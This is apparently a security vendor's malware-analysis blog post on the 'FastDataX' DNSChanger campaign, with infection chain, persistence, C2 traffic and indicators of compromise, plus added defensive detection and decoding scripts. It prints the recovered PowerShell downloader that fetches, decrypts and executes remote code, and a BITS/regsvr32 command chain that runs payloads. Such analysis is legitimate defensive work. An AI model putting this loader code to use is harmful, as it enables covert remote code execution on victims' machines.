Watch Out: The FastDataX campaign – DNSChanger is Back!

Verint’s Cyber Research team has recently discovered evidence of a new campaign for a variant of the infamous DNSChanger Trojan, which, as its name implies, alters a computer’s DNS entries to point toward rogue name servers. The new Trojan was identified through alerts in a Verint Threat Protection System (TPS) installation, which were triggered by its behavioral C&C detection engine. The alerts triggered an automatic investigation in TPS, which identified other suspicious domains and combined all related alerts into one security incident.

Using forensic tools, Verint's Cyber Research team determined that this DNSChanger campaign uses familiar characteristics and patterns, such as PowerShell scripts, BITS jobs and the communication patterns seen in previous campaigns. Further analysis uncovered the initial infection point, related payloads and additional domains, and concluded that they are all part of the new campaign. Interestingly, the campaign uses new domains that were registered in March 2017 and had not yet been linked to DNSChanger.

Previous DNSChanger campaigns have been tightly connected with adware and PUAs as a source of (re)infection. This campaign uses a file named "fastdatax.exe", and initial analysis suggests this may be the DNSChanger itself. This file creates the BITS jobs that make the DNSChanger network connections to download and execute payloads (see below).

We named the current campaign "FastDataX" since it revolves around software with this name and communicates with FastDataX[dictionary word].info web sites.

This blog post is a detailed account of the Verint research team's findings and includes:

  • Initial detection of the malware via behavioral C&C alerts
  • Forensic analysis of infection point
  • Persistence methods
  • Related network traffic analysis
  • List of IOCs

INITIAL DETECTION

The Verint Threat Protection System (TPS) issued several behavioral C&C alerts pertaining to several fastdatax*.info domains and started an automatic investigation:

Verint Threat Protection System – C&C (Behavioral Analysis) Alert

Verint Threat Protection System – Link Analysis


INFECTION POINT

Forensic analysis of the alerted endpoint revealed the following scenario: a user voluntarily downloaded a malicious file from a file-sharing website. After the user double-clicked the file, an .xht file (XHTML, an HTML document defined as an XML application) was dropped and executed.

The .xht file included a link to

http[://]ab0cd85de032858b2efc-98b168bd21c640d1dbb3a0f567ddbbfe.r14.cf1.rackcdn.com/kOcQm1koU2hOmFWMxOJbQo0m9p/lpx.html

It also displayed several images hosted on imgur.com, which are instructions on how to save and execute the downloaded software:

Instructions on how to save and execute the downloaded software:


The execution of the file also triggered a chain of events which led to the installation of several software bundles that can be categorized as PUP/Adware. Among them were YeaDesktop, PCCleanPlus, X-Madbench and FastDataX. Of these, FastDataX looked the most curious and insidious.

As with previous campaigns (which abused applications like Optimizer Pro and System Healer), this adware is the second stage of infection for DNSChanger.

PERSISTENCE

Several persistence mechanisms were utilized by the installed PUP/Adware:

  • Registry 'Run' key – abused by adware such as YeaDesktop
  • Scheduled tasks named after the application, abused by adware like 'Pangody' and X-Madbench. For example, a scheduled task named "X-Madbench" executes rundll32 "C:\Program Files\X-Madbench\X-Madbench.dll",SceNcISYvR
  • Scheduled tasks with random names or GUIDs that execute DLLs via rundll32. For example, a scheduled task named "E3605470-291B-44EB-8648-745EE356599A"
  • Scheduled tasks with random names that execute PowerShell (see more details below)
  • BITS jobs (see more details below)
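The three scheduled-task patterns above can be triaged mechanically. The following is an added example (not Verint's tooling): it takes rows shaped like "schtasks /query /fo CSV /v" output (columns TaskName and Task To Run), flags GUID-style task names, rundll32 DLL loads and PowerShell actions, and runs over constructed sample rows modelled on the tasks described in this section; the ProgramData paths in the sample are made up.

```python
import csv
import io
import re

# A bare GUID as task name, e.g. "E3605470-291B-44EB-8648-745EE356599A" (with or without braces)
GUID_RE = re.compile(r"^\{?[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}?$")
# rundll32 loading a DLL and calling an export by name (the export seen on this page looks random)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?,\s*(\w+)', re.IGNORECASE)
PS_RE = re.compile(r"powershell(?:\.exe)?", re.IGNORECASE)


def triage_task(task_name, action):
    """Return the FastDataX persistence patterns that a scheduled task matches ([] if none)."""
    reasons = []
    leaf = task_name.rsplit("\\", 1)[-1]          # drop the task folder, keep the task's own name
    if GUID_RE.match(leaf):
        reasons.append("guid-name")
    m = RUNDLL_RE.search(action)
    if m:
        reasons.append("rundll32:" + m.group(1))    # the DLL rundll32 is asked to load
    if PS_RE.search(action):
        reasons.append("powershell")
    return reasons


def triage_csv(text):
    """Run triage_task over rows shaped like 'schtasks /query /fo CSV /v' output."""
    hits = {}
    for row in csv.DictReader(io.StringIO(text)):
        reasons = triage_task(row["TaskName"], row["Task To Run"])
        if reasons:
            hits[row["TaskName"]] = reasons
    return hits


# Constructed sample rows modelled on the tasks described above; the ProgramData paths are made up
SAMPLE = '''"TaskName","Task To Run"
"\\X-Madbench","rundll32 ""C:\\Program Files\\X-Madbench\\X-Madbench.dll"",SceNcISYvR"
"\\E3605470-291B-44EB-8648-745EE356599A","rundll32.exe ""C:\\ProgramData\\sample\\sample.dll"",Run"
"\\{7D0A0D47-057F-040C-7E11-7E0D7905117D}","powershell.exe -NoProfile -File C:\\ProgramData\\sample\\task.ps1"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c"
'''

if __name__ == "__main__":
    for name, why in triage_csv(SAMPLE).items():
        print(name, "->", ", ".join(why))
```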

PowerShell

FastDataX.exe maintains persistence via a scheduled task named "FastDataX", and an additional scheduled task is created with a GUID-style name (7D0A0D47-057F-040C-7E11-7E0D7905117D). This task runs the following PowerShell:

$ErrorActionPreference="stop";
$sc="SilentlyContinue";
$WarningPreference=$sc;
$ProgressPreference=$sc;
$VerbosePreference=$sc;
$DebugPreference=$sc;
# registry update - position windows out of bounds of the screen
function RegistryUpdate($p){
    $n="WindowPosition";
    try{ New-Item -Path $p|Out-Null; } catch{ }
    try{
        New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|Out-Null;
    }
    catch{
        try{ Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null; } catch{ }
    }
}
RegistryUpdate("HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe");
RegistryUpdate("HKCU:\Console\%SystemRoot%_System32_svchost.exe");
RegistryUpdate("HKCU:\Console\taskeng.exe");
# this is the URL with the GET params
$surl="http[://]fastdataxster[.]info/u/?a=2tpeW5PNy/** snipped by VERINT to protect customer privacy */";
# end of URL with params
$stsk="{7D0A0D47-057F-040C-7E11-7E0D7905117D}";
$prid="FastDataX";
$inid="NRMNUMSW";
try{
    # check the PS version - if 1, exit
    if($PSVersionTable.PSVersion.Major -lt 2){ break; }
    $v=[System.Environment]::OSVersion.Version;
    # checks if the Windows environment is earlier than expected; exit if it is
    if($v.Major -eq 5){
        if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion -lt 2)){ break; }
    }
    # check for a privileged user - if not administrator, exit
    if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){ break; }
    # GET request: download further instructions using a "legit" UA (not really)
    function downloadCmd($url){
        $rq=New-Object System.Net.WebClient;
        $rq.UseDefaultCredentials=$true;
        $rq.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");
        return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));
    }
    # Decryption scheme (second byte in the stream is used as XOR key + offset, then AND 0xFF)
    function decryptCmd($rawdata){
        $bt=[Convert]::FromBase64String($rawdata);
        $ext=$bt[0];
        $key=$bt[1] -bxor 170;
        for($i=2; $i -lt $bt.Length; $i++){
            $bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));
        }
        return (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt, 2, ($bt.Length-$ext))), [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
    }
    $sc=decryptCmd(downloadCmd($surl));
    Invoke-Expression -command "$sc";
}
catch{};
exit 0;

This PS script combines an outgoing GET request to fastdataxster[.]info with decryption of the response body. The decrypted response holds code to execute and can thus extend the malware's capabilities at will.

The structure of this PowerShell is similar to a previously analyzed DNSChanger PS script. It should be noted that the domain embedded inside the script is new and was not previously linked to the DNSChanger campaign.
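For analysts who capture the C&C response on the wire, the decryptCmd routine above is easy to replicate offline. The following is an added example, not Verint's or the malware's code: decrypt_cmd mirrors the script's decoding steps (base64, byte 1 XOR 0xAA as rolling key, trailer length in byte 0, raw DEFLATE), and encode_cmd is a constructed helper used only to build a sample blob for exercising the decoder; the real server-side encoder is not on the page.

```python
import base64
import zlib


def decrypt_cmd(rawdata):
    """Decode a FastDataX C2 response exactly as the recovered script's decryptCmd does."""
    bt = bytearray(base64.b64decode(rawdata))
    ext = bt[0]                       # byte 0: how much to leave off the end (header + trailer)
    key = bt[1] ^ 170                 # byte 1 XOR 0xAA seeds the rolling key
    for i in range(2, len(bt)):
        bt[i] ^= (key + i) & 255      # position-dependent XOR, as in the PowerShell loop
    body = bytes(bt[2:2 + len(bt) - ext])   # MemoryStream($bt, 2, $bt.Length - $ext)
    return zlib.decompress(body, wbits=-15).decode("ascii")   # raw DEFLATE = .NET DeflateStream


def encode_cmd(plaintext, key_byte=0x5C, trailer=b""):
    """Build a blob in the same format. Constructed here only to exercise decrypt_cmd offline;
    the real server-side encoder is not on the page."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    body = comp.compress(plaintext.encode("ascii")) + comp.flush()
    bt = bytearray([2 + len(trailer), key_byte ^ 170]) + body + trailer
    for i in range(2, 2 + len(body)):
        bt[i] ^= (key_byte + i) & 255
    return base64.b64encode(bytes(bt)).decode("ascii")


if __name__ == "__main__":
    # Constructed sample: a harmless one-liner wrapped the way the C2 wraps its payload
    blob = encode_cmd("Write-Output 'hello from sample'", trailer=b"\x00\x00\x00")
    print(decrypt_cmd(blob))
```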

BITS job:

FastDataX also uses BITS (Background Intelligent Transfer Service) jobs, which generate HTTP HEAD requests to fastdataxcast[.]info and fastdataxfire[.]info. We could not find online information regarding these domains or any association between them and the current malware campaign.

That being said, the two types of BITS job are identical to previously analyzed BITS jobs.

The following BITS job is an example of a task recovered from the BITS logs of the infected endpoint; it is used to download, install and clean up the malware payloads.

BITS job to create batch

(one command line, wrapped here at each & for readability)

"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\4806190a-7c75-1\x.bat"
  & echo bitsadmin /complete 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat"
  & echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat"
  & echo if exist "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" goto q >> "C:\ProgramData\4806190a-7c75-1\x.bat"
  & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\4806190a-7c75-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\%i" >> "C:\ProgramData\4806190a-7c75-1\x.bat")) > nul
  & echo :q >> "C:\ProgramData\4806190a-7c75-1\x.bat"
  & echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" >> "C:\ProgramData\4806190a-7c75-1\x.bat"
  & echo del "C:\ProgramData\4806190a-7c75-1\x.bat" ^& exit >> "C:\ProgramData\4806190a-7c75-1\x.bat"
  & "C:\ProgramData\4806190a-7c75-1\x.bat"" ./.S-1-5-21-3582221642-4087043515-2770962101-1001

Changes to the DNS settings

DNSChanger has been using one of three methods in order to change the DNS settings:

  • Modifying the 'NameServer' and 'DHCPNameServer' values in the Windows registry, thus replacing the configured servers with new DNS servers (and calling the DhcpNotifyConfigChange API)
  • Changing the router's DNS configuration (as analysed by Proofpoint)
  • Editing the local HOSTS file

The 'FastDataX' variant of DNSChanger uses the third method. It adds multiple domains (see the list in the IOC section of this article) that are used to download additional payloads.

NETWORK ANALYSIS

An analysis with Verint's TPS Network Forensics component, which enables a detailed network analysis, revealed evidence of the malware's C&C communication. This enabled the Cyber Research team to distinguish between three types of sessions with similar structures:

1. HEAD request sessions to "fastdataxfire[.]info" and "fastdataxcast[.]info". As discussed above, these are generated by FastDataX BITS jobs:

2. GET request sessions to “fastdataxster[.]info” that were generated by the above mentioned PowerShell script:

3. POST request sessions to "fastdataxient[.]info", "fastdataxium[.]info" and "fastdataxify[.]info"

It should be noted that all the FastDataX domains resolved to the IP address 81.171.14.67, which was used in a previous DNSChanger campaign.

As can be seen from the above images, the user agents used by the malware differ from each other and are spoofed. A noticeable example is a "bug" in generating a user-agent, where the words "user agent" appear twice:

The traffic has a structure similar to what was observed in the past and attributed to DNSChanger, where the parameters contained system information and DNS configuration information.
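The session types above (HEAD, GET and POST to fastdatax*.info, all resolving to 81.171.14.67, with spoofed and occasionally malformed user agents) translate directly into detection logic over proxy logs. The following is an added example, not part of the original post: the log format (source IP, method, host, path, destination IP, quoted user agent) and the sample lines are constructed, and the duplicated "user-agent" text stands in for the UA bug the post describes but does not quote.

```python
import re
from collections import defaultdict

C2_HOST_RE = re.compile(r"^fastdatax[a-z]+\.info$", re.IGNORECASE)   # FastDataX[dictionary word].info
C2_IP = "81.171.14.67"                                                  # the address every FastDataX domain resolved to

# Constructed proxy-style log lines: src_ip method host path dst_ip "user-agent"
LOG = """10.0.0.15 HEAD fastdataxcast.info / 81.171.14.67 "Mozilla/5.0 (Windows NT 6.1)"
10.0.0.15 GET fastdataxster.info /u/?a=REDACTED 81.171.14.67 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)"
10.0.0.15 POST fastdataxify.info /p/ 81.171.14.67 "User-Agent: User-Agent: Mozilla/5.0"
10.0.0.22 GET www.example.com / 203.0.113.5 "Mozilla/5.0 (Windows NT 10.0)"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "(.*)"$')


def classify(line):
    """Return (src, host, ua, reasons) for one log line; reasons is empty when nothing matched."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, method, host, path, dst, ua = m.groups()
    reasons = []
    if C2_HOST_RE.match(host):
        reasons.append("fastdatax-domain:" + method)      # which of the three session types this is
    if dst == C2_IP:
        reasons.append("known-c2-ip")
    if len(re.findall(r"user-agent", ua, re.IGNORECASE)) >= 2:
        reasons.append("duplicated-ua-token")             # the UA-generation "bug" described above
    return src, host, ua, reasons


def detect(log):
    """Return (alerts, rotating): per-line alerts and sources that used several distinct UAs."""
    alerts = []
    uas = defaultdict(set)
    for line in log.splitlines():
        parsed = classify(line)
        if parsed is None:
            continue
        src, host, ua, reasons = parsed
        if reasons:
            alerts.append((src, host, reasons))
            uas[src].add(ua)                               # spoofed UAs differ per session type
    rotating = sorted(src for src, seen in uas.items() if len(seen) > 1)
    return alerts, rotating


if __name__ == "__main__":
    found, rotating = detect(LOG)
    for src, host, why in found:
        print(src, host, ", ".join(why))
    print("sources rotating user agents:", rotating)
```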

Below is a list of identified IOCs relating to the FastDataX campaign.

IOCs

Domains/IPs:

Seen on 21-22.06.2017 in Verint TPS
81.171.14.67
fastdataxium[.]info
fastdataxcast[.]info
fastdataxfire[.]info
fastdataxster[.]info
fastdataxient[.]info
fastdataxify[.]info

Related domains:


Domains found inside the HOSTS file


Hashes:

MD5                               SHA256                                                            Description
fdfebd2ba002b18eac079a1ac21ef70d  16ea0a1c090e8084cbee7d5b9eb55d07d7db09eb58ee93fe096c9b624d9dae64  Payload downloader (.xht)
a11e1be8f9418f4e075b4c9794bc75f8  a779534bd4110602ef630a0afe8031f931d7fa4f7ef84b3e449d915a60d1b0ea  Pangody.dll
8c03a0be7aadec4506fc52c4a507e320  f1eda24967aafc09d82418d8e92a189221bdfe52befa7cbbdb6d8642a8ffd5b8  X-Madbench.dll

Author: Verint Research Lab